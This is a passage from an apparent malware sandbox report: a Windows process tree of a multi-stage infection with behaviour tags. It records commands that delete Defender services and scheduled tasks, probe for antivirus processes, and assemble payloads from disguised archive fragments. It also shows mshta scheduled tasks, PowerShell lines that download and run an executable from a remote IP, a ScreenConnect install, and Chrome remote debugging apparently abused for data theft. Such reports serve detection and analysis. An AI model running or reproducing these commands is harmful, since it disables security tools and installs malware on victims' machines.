        Launches sc.exe
        
        PID:2708
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f
        9⤵
        
        PID:1628
        
        C:\Windows\system32\sc.exe
        
        sc stop "MsSecCore"
        9⤵
        Launches sc.exe
        
        PID:2808
        
        C:\Windows\system32\sc.exe
        
        sc delete "MsSecCore"
        9⤵
        Launches sc.exe
        
        PID:2224
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f
        9⤵
        
        PID:2152
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f
        9⤵
        
        PID:2256
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f
        9⤵
        
        PID:2188
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f
        9⤵
        
        PID:1180
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f
        9⤵
        
        PID:2100
        
        C:\Windows\system32\sc.exe
        
        sc stop ddrver
        9⤵
        Launches sc.exe
        
        PID:2208
        
        C:\Windows\system32\sc.exe
        
        sc delete ddrver
        9⤵
        Launches sc.exe
        
        PID:376
  - - C:\Users\Admin\AppData\Local\Temp\10338870101\TbV75ZR.exe
      "C:\Users\Admin\AppData\Local\Temp\10338870101\TbV75ZR.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Drops file in Windows directory
      System Location Discovery: System Language Discovery
      PID:784
    - - C:\Windows\SysWOW64\CMD.exe
        
        "C:\Windows\system32\CMD.exe" /c copy Edit.vss Edit.vss.bat & Edit.vss.bat
        5⤵
        Loads dropped DLL
        
        PID:2636
      - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        6⤵
        Enumerates processes with tasklist
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:1676
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "opssvc wrsa"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:556
      - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        6⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:2472
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"
        6⤵
        
        PID:1584
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c md 267978
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:2708
      - C:\Windows\SysWOW64\extrac32.exe
        
        extrac32 /Y /E Spanish.vss
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:2800
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V "East" Removed
        6⤵
        
        PID:2252
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b 267978\Exam.com + Vermont + Conflict + Remarks + Safer + Districts + Eddie + Awful + Garage + Sexually + Mitsubishi + Freeware 267978\Exam.com
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:2640
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b ..\Austin.vss + ..\Canal.vss + ..\Cottage.vss + ..\Engineers.vss + ..\Racks.vss + ..\Spy.vss + ..\Weekends.vss + ..\Shirt.vss + ..\Fields.vss + ..\Flyer.vss + ..\Strengthening.vss + ..\Floors.vss j
        6⤵
        
        PID:2668
      - C:\Users\Admin\AppData\Local\Temp\267978\Exam.com
        
        Exam.com j
        6⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:2852
      - C:\Windows\SysWOW64\choice.exe
        
        choice /d y /t 5
        6⤵
        
        PID:284
  - - C:\Users\Admin\AppData\Local\Temp\10340260101\cdfca381b2.exe
      "C:\Users\Admin\AppData\Local\Temp\10340260101\cdfca381b2.exe"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Executes dropped EXE
      Identifies Wine through registry keys
      Suspicious use of NtSetInformationThreadHideFromDebugger
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:1688
  - - C:\Users\Admin\AppData\Local\Temp\10340340101\tool.exe
      "C:\Users\Admin\AppData\Local\Temp\10340340101\tool.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:1580
    - - C:\Windows\SysWOW64\msiexec.exe
        
        "C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\ScreenConnect\24.4.4.9118\f63a82ffaf9f93d1\ScreenConnect.ClientSetup.msi"
        5⤵
        Enumerates connected drives
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        
        PID:2224
  - - C:\Users\Admin\AppData\Local\Temp\10340560101\WLbfHbp.exe
      "C:\Users\Admin\AppData\Local\Temp\10340560101\WLbfHbp.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Drops file in Windows directory
      System Location Discovery: System Language Discovery
      PID:1376
    - - C:\Windows\SysWOW64\CMD.exe
        
        "C:\Windows\system32\CMD.exe" /c copy Edit.vss Edit.vss.bat & Edit.vss.bat
        5⤵
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        
        PID:1896
      - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        6⤵
        Enumerates processes with tasklist
        System Location Discovery: System Language Discovery
        
        PID:1720
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "opssvc wrsa"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:2492
      - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        6⤵
        Enumerates processes with tasklist
        
        PID:1412
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:1556
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c md 267978
        6⤵
        
        PID:2336
      - C:\Windows\SysWOW64\extrac32.exe
        
        extrac32 /Y /E Spanish.vss
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:2964
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V "East" Removed
        6⤵
        
        PID:1348
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b 267978\Exam.com + Vermont + Conflict + Remarks + Safer + Districts + Eddie + Awful + Garage + Sexually + Mitsubishi + Freeware 267978\Exam.com
        6⤵
        
        PID:2808
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b ..\Austin.vss + ..\Canal.vss + ..\Cottage.vss + ..\Engineers.vss + ..\Racks.vss + ..\Spy.vss + ..\Weekends.vss + ..\Shirt.vss + ..\Fields.vss + ..\Flyer.vss + ..\Strengthening.vss + ..\Floors.vss j
        6⤵
        
        PID:2012
      - C:\Users\Admin\AppData\Local\Temp\267978\Exam.com
        
        Exam.com j
        6⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:2724
      - C:\Windows\SysWOW64\choice.exe
        
        choice /d y /t 5
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:1544
  - - C:\Users\Admin\AppData\Local\Temp\10340730101\BIm18E9.exe
      "C:\Users\Admin\AppData\Local\Temp\10340730101\BIm18E9.exe"
      4⤵
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      PID:2176
  - - C:\Users\Admin\AppData\Local\Temp\10341130101\5c58648e92.exe
      "C:\Users\Admin\AppData\Local\Temp\10341130101\5c58648e92.exe"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Executes dropped EXE
      Identifies Wine through registry keys
      Loads dropped DLL
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Suspicious use of SetThreadContext
      Suspicious behavior: EnumeratesProcesses
      PID:1464
    - - C:\Users\Admin\AppData\Local\Temp\svchost015.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10341130101\5c58648e92.exe"
        5⤵
        Downloads MZ/PE file
        Executes dropped EXE
        
        PID:1488
  - - C:\Users\Admin\AppData\Local\Temp\10341140101\7cec070324.exe
      "C:\Users\Admin\AppData\Local\Temp\10341140101\7cec070324.exe"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Executes dropped EXE
      Identifies Wine through registry keys
      Loads dropped DLL
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Suspicious use of SetThreadContext
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:2660
    - - C:\Users\Admin\AppData\Local\Temp\svchost015.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10341140101\7cec070324.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:296
  - - C:\Users\Admin\AppData\Local\Temp\10341150101\b66824f2c4.exe
      "C:\Users\Admin\AppData\Local\Temp\10341150101\b66824f2c4.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of FindShellTrayWindow
      Suspicious use of SendNotifyMessage
      PID:2716
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c schtasks /create /tn cOrGCmab1gV /tr "mshta C:\Users\Admin\AppData\Local\Temp\2yuT2dNIS.hta" /sc minute /mo 25 /ru "Admin" /f
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1584
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn cOrGCmab1gV /tr "mshta C:\Users\Admin\AppData\Local\Temp\2yuT2dNIS.hta" /sc minute /mo 25 /ru "Admin" /f
        6⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:908
    - - C:\Windows\SysWOW64\mshta.exe
        
        mshta C:\Users\Admin\AppData\Local\Temp\2yuT2dNIS.hta
        5⤵
        Modifies Internet Explorer settings
        
        PID:2708
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'XDSVAZCYSF9JZHVCOIN4MTVBZHSORBDJ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
        6⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Downloads MZ/PE file
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:2124
        
        C:\Users\Admin\AppData\Local\TempXDSVAZCYSF9JZHVCOIN4MTVBZHSORBDJ.EXE
        
        "C:\Users\Admin\AppData\Local\TempXDSVAZCYSF9JZHVCOIN4MTVBZHSORBDJ.EXE"
        7⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious behavior: EnumeratesProcesses
        
        PID:1612
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\10341160121\am_no.cmd" "
      4⤵
      System Location Discovery: System Language Discovery
      PID:2704
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 2
        5⤵
        Delays execution with timeout.exe
        
        PID:2760
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
        5⤵
        
        PID:568
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2968
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
        5⤵
        
        PID:2268
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
        6⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:2872
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1916
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2492
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn "yGeNpmat1A5" /tr "mshta \"C:\Temp\yiwPkauxV.hta\"" /sc minute /mo 25 /ru "Admin" /f
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2020
    - - C:\Windows\SysWOW64\mshta.exe
        
        mshta "C:\Temp\yiwPkauxV.hta"
        5⤵
        System Location Discovery: System Language Discovery
        Modifies Internet Explorer settings
        
        PID:2992
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
        6⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Downloads MZ/PE file
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:1500
        
        C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
        7⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious behavior: EnumeratesProcesses
        
        PID:2852
  - - C:\Users\Admin\AppData\Local\Temp\10341170101\WLbfHbp.exe
      "C:\Users\Admin\AppData\Local\Temp\10341170101\WLbfHbp.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Drops file in Windows directory
      PID:2320
    - - C:\Windows\SysWOW64\CMD.exe
        
        "C:\Windows\system32\CMD.exe" /c copy Edit.vss Edit.vss.bat & Edit.vss.bat
        5⤵
        Loads dropped DLL
        
        PID:2380
      - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        6⤵
        Enumerates processes with tasklist
        
        PID:2280
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "opssvc wrsa"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:600
      - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        6⤵
        Enumerates processes with tasklist
        System Location Discovery: System Language Discovery
        
        PID:1304
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:1768
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c md 267978
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:1596
      - C:\Windows\SysWOW64\extrac32.exe
        
        extrac32 /Y /E Spanish.vss
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:1332
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V "East" Removed
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:3012
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b 267978\Exam.com + Vermont + Conflict + Remarks + Safer + Districts + Eddie + Awful + Garage + Sexually + Mitsubishi + Freeware 267978\Exam.com
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:616
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b ..\Austin.vss + ..\Canal.vss + ..\Cottage.vss + ..\Engineers.vss + ..\Racks.vss + ..\Spy.vss + ..\Weekends.vss + ..\Shirt.vss + ..\Fields.vss + ..\Flyer.vss + ..\Strengthening.vss + ..\Floors.vss j
        6⤵
        
        PID:1424
      - C:\Users\Admin\AppData\Local\Temp\267978\Exam.com
        
        Exam.com j
        6⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:1984
      - C:\Windows\SysWOW64\choice.exe
        
        choice /d y /t 5
        6⤵
        
        PID:2968
  - - C:\Users\Admin\AppData\Local\Temp\10341180101\f73ae_003.exe
      "C:\Users\Admin\AppData\Local\Temp\10341180101\f73ae_003.exe"
      4⤵
      Executes dropped EXE
      PID:2304
  - - C:\Users\Admin\AppData\Local\Temp\10341190101\TbV75ZR.exe
      "C:\Users\Admin\AppData\Local\Temp\10341190101\TbV75ZR.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Drops file in Windows directory
      System Location Discovery: System Language Discovery
      PID:2184
    - - C:\Windows\SysWOW64\CMD.exe
        
        "C:\Windows\system32\CMD.exe" /c copy Edit.vss Edit.vss.bat & Edit.vss.bat
        5⤵
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        
        PID:1088
      - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        6⤵
        Enumerates processes with tasklist
        
        PID:2076
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "opssvc wrsa"
        6⤵
        
        PID:3008
      - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        6⤵
        Enumerates processes with tasklist
        
        PID:1720
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"
        6⤵
        
        PID:948
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c md 267978
        6⤵
        
        PID:3036
      - C:\Windows\SysWOW64\extrac32.exe
        
        extrac32 /Y /E Spanish.vss
        6⤵
        
        PID:1752
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b 267978\Exam.com + Vermont + Conflict + Remarks + Safer + Districts + Eddie + Awful + Garage + Sexually + Mitsubishi + Freeware 267978\Exam.com
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:1920
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b ..\Austin.vss + ..\Canal.vss + ..\Cottage.vss + ..\Engineers.vss + ..\Racks.vss + ..\Spy.vss + ..\Weekends.vss + ..\Shirt.vss + ..\Fields.vss + ..\Flyer.vss + ..\Strengthening.vss + ..\Floors.vss j
        6⤵
        
        PID:1440
      - C:\Users\Admin\AppData\Local\Temp\267978\Exam.com
        
        Exam.com j
        6⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:2488
      - C:\Windows\SysWOW64\choice.exe
        
        choice /d y /t 5
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:2432
  - - C:\Users\Admin\AppData\Local\Temp\10341200101\7IIl2eE.exe
      "C:\Users\Admin\AppData\Local\Temp\10341200101\7IIl2eE.exe"
      4⤵
      Executes dropped EXE
      Drops file in Windows directory
      System Location Discovery: System Language Discovery
      PID:2744
    - - C:\Windows\SysWOW64\CMD.exe
        
        "C:\Windows\system32\CMD.exe" /c copy Expectations.cab Expectations.cab.bat & Expectations.cab.bat
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1184
      - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        6⤵
        Enumerates processes with tasklist
        System Location Discovery: System Language Discovery
        
        PID:2180
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "opssvc wrsa"
        6⤵
        
        PID:2076
      - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        6⤵
        Enumerates processes with tasklist
        
        PID:928
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:1444
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c md 418377
        6⤵
        
        PID:1704
      - C:\Windows\SysWOW64\extrac32.exe
        
        extrac32 /Y /E Leon.cab
        6⤵
        
        PID:2020
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V "BEVERAGES" Compilation
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:2200
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b 418377\Passwords.com + Playing + New + Realized + Uw + Jpeg + Badly + Asbestos + Seeds + Service + Basis + Via 418377\Passwords.com
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:2968
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b ..\Pendant.cab + ..\Visitor.cab + ..\Illegal.cab + ..\Suddenly.cab + ..\Theology.cab + ..\Kidney.cab + ..\Flying.cab + ..\Tigers.cab N
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:2568
      - C:\Users\Admin\AppData\Local\Temp\418377\Passwords.com
        
        Passwords.com N
        6⤵
        Executes dropped EXE
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:2124
      - C:\Windows\SysWOW64\choice.exe
        
        choice /d y /t 5
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:3052
  - - C:\Users\Admin\AppData\Local\Temp\10341210101\d503addcb6.exe
      "C:\Users\Admin\AppData\Local\Temp\10341210101\d503addcb6.exe"
      4⤵
      Executes dropped EXE
      PID:2460
    - - C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 2460 -s 64
        5⤵
        
        PID:2180
  - - C:\Users\Admin\AppData\Local\Temp\10341220101\BIm18E9.exe
      "C:\Users\Admin\AppData\Local\Temp\10341220101\BIm18E9.exe"
      4⤵
      Executes dropped EXE
      PID:1044
  - - C:\Users\Admin\AppData\Local\Temp\10341230101\dd61b02106.exe
      "C:\Users\Admin\AppData\Local\Temp\10341230101\dd61b02106.exe"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Executes dropped EXE
      Identifies Wine through registry keys
      Suspicious use of NtSetInformationThreadHideFromDebugger
      PID:2364
  - - C:\Users\Admin\AppData\Local\Temp\10341240101\3bf4987416.exe
      "C:\Users\Admin\AppData\Local\Temp\10341240101\3bf4987416.exe"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Executes dropped EXE
      Identifies Wine through registry keys
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Checks processor information in registry
      PID:1560
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
        5⤵
        Uses browser remote debugging
        Enumerates system info in registry
        Suspicious use of FindShellTrayWindow
        
        PID:1680
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef6b29758,0x7fef6b29768,0x7fef6b29778
        6⤵
        
        PID:600
      - C:\Windows\system32\ctfmon.exe
        
        ctfmon.exe
        6⤵
        
        PID:1612
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1144 --field-trial-handle=836,i,3634394833601959962,10275358058309288732,131072 /prefetch:2
        6⤵
        
        PID:1608
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1508 --field-trial-handle=836,i,3634394833601959962,10275358058309288732,131072 /prefetch:8
        6⤵
        
        PID:1816
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1552 --field-trial-handle=836,i,3634394833601959962,10275358058309288732,131072 /prefetch:8
        6⤵
        
        PID:2672
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2120 --field-trial-handle=836,i,3634394833601959962,10275358058309288732,131072 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:1948
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2548 --field-trial-handle=836,i,3634394833601959962,10275358058309288732,131072 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:1556
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=2556 --field-trial-handle=836,i,3634394833601959962,10275358058309288732,131072 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:1800
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1376 --field-trial-handle=836,i,3634394833601959962,10275358058309288732,131072 /prefetch:2
        6⤵
        
        PID:3504
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
        5⤵
        Uses browser remote debugging
        
        PID:3188
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef69d9758,0x7fef69d9768,0x7fef69d9778
        6⤵
        
        PID:2992
      - C:\Windows\system32\ctfmon.exe
        
        ctfmon.exe
        6⤵
        
        PID:3324
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
